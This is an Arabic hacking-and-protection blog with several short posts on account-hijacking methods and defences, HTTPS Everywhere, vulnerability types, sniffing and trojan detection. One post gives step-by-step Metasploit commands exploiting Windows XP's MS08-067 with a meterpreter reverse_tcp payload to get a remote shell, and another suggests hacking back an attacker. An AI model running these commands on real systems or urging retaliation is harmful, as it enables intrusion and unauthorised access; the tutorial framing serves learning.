الاثنين، 21 يناير 2013

طرق لاختراق الحسابات و طرق مضادة للحماية من اختراقها

بسم الله الرحمن الرحيم

سوف نتحدث اليوم عن بعض الطرق التي تمكن الهكر من أختراق ايميلك أو حسابك الشخصي على اي موقع من مواقع الشبكة العنكبوتية
هذه الطرق كثيرة و متعددة و كل يوم يأتينا هكر جديد بطريقة جديدة و لكن الطرق المتعارف عليها أو التي اصبحت شائعة هي كالتالي

أولا
phishing
و هي تعني باللغة العربية التصيد و هي من أكثر الطرق شيوعا الى حد الان في أختراق الحسابات و من لا يعرف هذه الطريقة فليكمل القراءة
هذه الطريقة تكمن في عمل صفحة مشابهه للموقع الاصلي و أعطائها للضحية و هو يقوم بادخال اليوزر نيم و الباسوورد و بالتالي هذه المعلومات تصل اليك و لا يتمكن من الدخول الى الموقع وقد تتم هذه العملية داخل شبكة تكون أنت كمهاجم موجود مع الضحية داخل شبكة واحدة أو غير ذلك

للحماية من هذه الطريقة
أستخدم دائما التصفح الامن في كل المواقع التي تستخدمها : قوقل او فيس بوك او ياهو أو غير ذلك من المواقع التي تحتوي على حسابات مهمه لك
لا ستخدام خيارات الامان في متصفح قوقل جروم اتبع الرابط هنا

الطريقة الثانية في الاختراق و هي
Brute Force
و هذه الطريقة تعني تخمين كلمة السر يعني أن نقوم بتجربة مجموعة كبيرة من الاحتمالات يعتقد أنها كلمة السر
من مساوىء هذه الطريقة أنها تأخذ وقت من الهكر و هو يجرب كلمات السر

للحماية منها
أجعل كلمة السر كبيرة أو معقدة قدر الامكان أخلط بين الحروف و الارقام و أجعل كلمة السر صعبة التخمين
لتعرف كيف تضع باسوورد مناسب أبحث في قوقل عن طرق حماية الباسوورد

الطريقة الثالثة هي
Keyloggers
طبعا أكيد الجميع يعرف ما هو
Keyloggers
و اذا كنتم لا تعرفون فانها عبارة عن برامج تتجسس على ما يكتبه الشخص على جهاز الحاسوب مثل كلمات السر و غير ذلك حتى أنبعض ال
Keyloggers
تستطيع أن تعرف كل حرف يكتبه الشخص على حاسوبه

للحماية من هذه الطريقة
أستخدم برامج مكافح للفيروسات و دائما قم بتحديثه أذا لم تقم بتحديثه فاعلم أنك قد تكون عرضة لاحد ال
Keyloggers
الجديدة

الطريقة الرابعة وهي
Guessing The Secret Question

وتعني تخمين السؤال السري
الجميع يعرف انه عندما تنسى الباسوورد الخاص بك في أحد الحسابات فانه يمكنك استرجاع هذا الحساب عن طريق الاجابة على الاسئلة السرية التي كنت قد وضعتها عند انشاء حسابك و هذه الاجابة التي قد وضعتها قد تكون سهلة الحصول عليها مثل اسم المدينة التي ولدت فيها أو تاريخ الميلاد فهذه المعلومات من السهل أن يحصل عليها الهكر و بذلك فهو يتمكن من أختراق حسابك

للحماية من هذه الطريقة
علبيك أن تضع اجوبة لا تخطر في بال الهكر  كأن تضع تاريخ ميلادك ليس رقم بل تضعه كلمه مثل هذه
dhsfdgfhg
أو ما شابه ذلك من الطرق بحيث أن الهكر لا يمكنه معرفة اجوبة الاسئلة السرية

و بذلك أكون قد ختمت مقالة اليوم عسى أن القاكم في مقالة جديدة و موضوع جديد

و السلام عليكم و رحمة الله و بركاته

إقرأ المزيد Résuméabuiyad

استخدم الاتصال الامن في كل مكان على الانترنت HTTPS Everywhere

بسم الله الرحمن الرحيم










تتمكن السلطات في بلدك من مراقبة كل اتصالاتك و كل ما تقوم به على شبكة الانترنت و ذلك باستخدام معدات و برامج يقومون بشرائها من شركات عالمية مخصصة لهذا الغرض .
كما أنه يمكن للهاكر أن يقوم بنفس العمل و لكن بشكل محدود فمثلا يمكنه أن يقوم بعدة عمليات مثلا هجوم من نوع
sniffing 

على شبكة يكون هو ضمنها أو ربما خارجها و يتمكن بذلك من الحصول على معلومات مهمه بالنسبة لك مثل البريد الالكتروني و الباسوورد وهذه أعمال لا بد أن نأخذ حذرنا منها و ذلك باستخدام هذه الأداة التي سأدلكم عليها و هي أداة
HTTPS Everywhere
هل تعرف اولا ما هو ال
HTTPS
انه الاتصال الامن عندما تتصل بمواقع على شبكة الانترنت فان بعضها توفر لك هذه الخدمة ولكن هذا لا يكفي يجب أن تستخدم هذه الاداة في كل مكان في الانترنت و ذلك عن طريق تثبيت هذه الأداة على متصفح فيرفوكس
من خلال الرابط التالي

بعد أن تضغط على الرابط اعمل
install
للاداة كما في الصورة





و بعد ذلك اعمل اعادة تشغيل لمتصفح الفير فوكس
الان و بعد تثبيت هذه الأدة أصبح اتصالك مشفرا و لكن هذا لا يعني أنك في أمان تام لا بل ان الموضوع أصبح اكثر صعوبة على السلطات التي تراقبك و على الهاكر الذي يريد معرفة باسووردات بريدك الالكتروني و ما الى ذلك من حسابات على لك على الشبكة العنكبوتية .

نلتقي في درس قادم ان شاء الله
السلام عليكم و رحمة الله وبركاته
إقرأ المزيد Résuméabuiyad

مقدمة عن الثغرات

بسم الله الرحمن الرحيم



سؤال يطرحه المبتدئين في تعلم أساليب الهكر و الحماية

أو الذين يريدون أن يتعلموا السيكيوريتي أو الاختراق .

ما هي الثغرات ؟؟

يمكننا القول الثغرة هي عبارة عن نقطة ضعف تمكن الهاكر من الاختراق .

و هذا الضعف قد يكون خطا برمجي مثلا يمكن استغلاله من قبل الهكر

بحيث يعطي أوامر للجهاز الهدف و ذلك الجهاز يقوم بتنفيذها مما يمكن الهاكر من

الاختراق الفعلي لجهاز الحاسوب .

لا يمكن معرفة عدد الثغرات الموجودة لان عالم الانترنت مليء بالثغرات

و هذه الثغرات قد تكون موجودة في أنظمة التشغيل مثلا ويندوز

أو قد تكون موجودة في أحد البرامج مثلا مشغل مقاطع الفيديو أو ما شابهه ذلك و قد

تكون موجودة في تطبيقات الانترنت مثلا صفحات ال

Php

أو قد تكون موجودة في أي شيء له علاقة بالتكنولوجيا و البرمجة و ما إلا ذلك يعني

قد تكون ايضا هذه الثغرة موجودة في نظام الطائرة أو في نظام المفاعل النووي أو

نظام السيارة و وجود ثغرات في مثل هذه الأنظمة الكبيرة قد يسبب مشاكل ضخمة لا

يمكن توقع نتائجها .

لتتمكن من دراسة الثغرات عليك أن تتعرف على أنواع الثغرات التي سوف أذكرها لك :

Sql Injection

Buffer Over Flow

File Include

XSS

و كل نوع من هذه الأنواع ينقسم إلى أكثر من قسم .

طبعا هذه ليست كل الأنواع بل هنالك أمور أخرى قد تصنف على أنها ثغرات أو نقاط

ضعف .

سؤال أخر قد يسأله بعض المبتدئين و هو :

ماذا يجب أن أعرف حتى أبدأ بتعلم الثغرات ؟؟

أولا أقول له كيف تبحث عن ثغرة في نظام لينكس و أنت أصلا لا تستخدم هذا النظام و

لا تعرفه . إذن يجب عليك التعامل و استخدام الأنظمة التي تبحث فيها عن ثغرات أو

تريد استغلال ثغرات موجودة فيها أصلا .

و ثانيا : أقول له كيف أصلا سوف تبحث عن مشاكل و أخطاء برمجية في أحد البرامج

أو التطبيقات و أنت أصلا لا تعرف في البرمجة . إذن يجب تعلم البرمجة .

ما هي لغات البرمجة التي يجب أن تتعلمها :

حقيقة أنا لا أحب أن أقول لك تعلم لغة كذا و كذا . فأنت حر في ما تريد أن تتعلم و ذلك

حسب طموحك فإذا أردت أن تبحث و تكتشف ثغرات في تطبيقات ال

Php

فعليك أن تتعلمها و كذلك الأمور الأخرى .

ولكن يمكنني بشكل عام أن أقول لك أنه كل ما كنت تعرف لغات برمجة أكثر كلما كنت

قادرا على اكتشاف الثغرات أكثر يمكنك أن تبدأ في لغة

Php

و بعد ذلك إلى باقي اللغات .

و لا تتوقف عند حد معين و لكن أخي تذكر أن لا تبدأ بالغات الصعبة من البداية ,

أنصحك أن تبدأ بالغات السهلة مثل :

Php, asp

و بعد ذلك يمكنك تعلم لغات :

C,C++, Assembly

هذا في ما يخص اكتشاف الثغرات و التحليل للبرامج و الأنظمة .

أما لتعلم الهكر بشكل عام فأنصحك بتعلم لغات

Python

ruby

Perl

وبعد ذلك باقي اللغات

و يجب أن تعرف أن المبرمج القوي هو الهاكر القوي و الحقيقي و غير ذلك هم مجرد

مقلدين للهكر الحقيقيين .

نلقاكم في درس قادم أن شاء الله
إقرأ المزيد Résuméabuiyad

اختبار اختراق ويندوز XP عن طريق البورت 445

بسم الله الرحمن الرحيم




كما يعرف الجميع فان ويندوز
XP
قد تخلت عنه شركة مايكروسوفت و توقفت عن دعمه مما بسبب كثرة ثغراته التي أصبحت منتشرة بشكل كبير و منها هذه الثغرة الموجودة في أغلب الأجهزة من هذا النظام 

و أعرف أنها أصبحت ثغرة قديمة و لكن سوف أذكرها للذكرى هي و ثغرات أخرى في هذا الويندوز حتى نقول بعدها أننا نستطيع قراءة الفاتحة على روح المرحوم
XP
مع أننا طبعا بإمكاننا من الآن قراءتها  

سوف يكون الاختبار عن طريق مشروع الميتاسبلويت

أولا : نكتب في الشل في باك تراك
Msfconsole
و ذلك لفتح الميتاسبلويت




ثانيا : نختار الثغرة عن طريق كتابة الامر التالي :

 Use windows/smb/ms08_067_netapi




ثالثا : نختار البايلود و ذلك عن طريق الأمر التالي :

Set payload windows/meterpreter/reverse_tcp




رابعا : نضع عنوان الجهاز الذي نريد اختراقه و ذلك بالأمر التالي :

Set rhost 172.0.0.1





خامسا : نضع عنوان جهازنا (عنوان جهاز المهاجم) بالأمر التالي :

Set lhost 172.0.0.1

طبعا هذه العناوين و هميه قم بتغييرها حسب الأجهزة التي لديك .





سادسا : أكتب هذه الكلمة لتنفيذ الاستغلال أو الثغرة .

Exploit

و شاهد نجاح الاستغلال  بالصورة التالية :





الان يمكننا تطبيق أوامر
Meterpreter
لاستكمال عملية الاختراق مثلا يمكنك كتابة أمر
Shell
حيث سوف يعطيك شل من جهاز الضحية (يعني شاشة الدوس)

شاهد الصورة :





إذن لقد أصبحنا الآن على الجهاز و نستطيع التحكم بأشياء كثيرة .

لكن هذا لا يكفي أنا أعرف أنك تريد معرفة أوامر ال
Meterpreter
سوف أشرحها في الدرس القادم انتظرنا لتتعرف عليها .

و السلام عليكم و رحمة الله و بركاته

إقرأ المزيد Résuméabuiyad

التصنت على الشبكات و ما يسمى بال Sniffing

بسم الله الرحمن الرحيم


Write tapping

أو ما يسمى التصنت على الكتابة و لو أن الترجمة غير دقيقة و لكن
التصنت على الكتابة هو عملية رصد المكالمات الهاتفية و الاتصالات عبر الانترنت من قبل طرف ثالث .

المهاجم يوصل جهاز الاستماع للمعلومات يمكن أن يكون برنامج أو جهاز أو مزيج من الاثنين , ليتنصت على المعلومات الدائرة بين هاتفين أو جهازين على الانترنت .

و تقسم ال
 Write tapping
إلى قسمين :



الأول :
Active write tapping
و هذا النوع هو يراقب و يسجل حركة المرور فقط .

أما النوع الثاني فهو :
Passive write tapping
و هذا النوع يراقب و يسجل حركة المرور و يغير حركة المرور .

Sniffing
و هي تشبه عملية التصنت و تستعمل فيها أدوات و برامج للقيام بهذه العملية و لكنها عادة ما تكون داخل الشبكة حيث أن الأدوات التي تعمل على ال
Sniffing
داخل الشبكة أصبح برامج عادية و منتشرة بكثرة . و لكنها تتميز في ما بينها بقدرة بعضها على العمل بكفاءة أكثر من الأخرى خاصة في ظل و جود إجراءات مضادة لمثل هذه الهجمات داخل الشبكة .

أما في ما يتعلق بمخاطر ال
Sniffing
أو ما يسمى بال
Sniffing Threats
فعليك أن تعرف أن المهاجم يستطيع أن يسرق معلومات مهمة جدا بواسطة عملية ال
Sniffing
داخل الشبكة شاهد الصورة لتعرف ماذا يمكن للمهاجم أن يفعل بواسطة مثل هذه العملية




أنه يستطيع أن يحصل على باسوردات الايميل و
Telnet
و باسوردات ال
FTP
كما أنه يستطيع أن يعرف ماذا تكتب في الدردشة و ماذا تتصفح من مواقع و كل ما تقوم باستعمال الانترنت تقريبا يمكن للمهاجم أن يحصل علية من خلال
Sniffing

فالمهاجم يعرف كل مرور تحصل في الشبكة من خلال
Sniffing

لكن هذه العملية تجري فقط ضمن شبكة فرعية معينة
و الخطير في هذه العملية أنه عادة يمكن لأي جهاز حاسوب محمول
Laptop
أن يصل إلى الشبكة و يندمج فيها .

نستكمل الحديث عن ال
Sniffing
في مقالات قادمة إن شاء الله

السلام عليكم و رحمة الله و بركاته

إقرأ المزيد Résuméabuiyad

شرح كيفية كشف الهاكر و الرد عليه

بسم الله الرحمن الرحيم

بالرغم من أننا نستخدم برامج مكافحة الفيروسات الا أننا لا نتأكد من أن جهازنا خالي من برامج التروجان التي يرسلها الهاكر ليتجسس على جهازنا لذلك فلا بد من طرق أخرى يمكننا من خلالها أن نتأكد من أن جهازك غير مخترق أو حتى لو كان مخترقا فكيف نكشف الهاكر الذي قام باختراقنا و كيف نرد علية .

هنالك عدة طرق لتتمكن من معرفة ما اذا كن جهازك مخترقا أم لا و أيضا هنالك عدة طرق لمعرفة الهاكر الذي قام باختراق و لكننا اليوم سوف نتحدث عن طريقة واحدة باستخدام برامج صغير جدا اسمة HeapMemView .

باستخدام هذا البرنامج يمكننا أن نشاهد العمليات التي تعمل على جهازنا و اذا استغربنا وجود عملية أو برنامج يعمل و نحن لا نعرفه أو نشك فيه فامكاننا أن نعرف ما اذا كان تروجان أم لا .
يمكنك تحميل البرنامج من هنا

بعد تحميل البرنامج قم بتشغيلة فسوف تظهر لك صورة العمليات التي تجري على جهازك كمثل الصورة التالية :



اختار العملية التي تعتقد بأنها برنامج تجسس من قبل هاكر و ذلك بالضغط عليها مره واحدة بزر الفأرة الأيسر و بعد ذلك اضغط ok و بذلك سوف تظهر لك صفحة مثل التي بالأسفل يمكنك من خلالها أن تبحث عن ال no-ip  الذي يقوم الهاكر المبتدئين بعمله حتى يصله التبليغ علية و لكنك بعد أن كشفته يمكنك الآن أن تقوم أنت باختراق هذا الطفل أو أن تقوم بإعطاء ال no-ip للشركة التي هو مشرك فيها و تخبرهم بانه يستخدمه لأغراض الاختراق و بذلك سوف تقوم الشركة بإلغاء هذا ال no-ip و بذلك فانه سوف يخسر كل الضحايا الذين اخترقهم .



و بذلك فانك قد تمكنك من معرفة من قام باختراقك و قمت أيضا بالرد علية بالشكل المناسب . و هكذا تنتهي مقالة اليوم .

و السلام عليكم و رحمة الله و بركاته
إقرأ المزيد Résuméabuiyad

السبت، 29 ديسمبر 2012

فيديو: اختراق نظام ويندوز باستخدام Nmap و Metasploit

فيديو يشرح استخدام أداة Nmap لفحص المنافذ الموجودة بالجهاز وتحديد نوع النظام وكيفية استغلال احدى الثغرات الموجودة في مشروع ميتاسبلويت لاختراق نظام ويندوز عن بعد في مدة لا تزيد عن 5 دقائق.






إقرأ المزيد Résuméabuiyad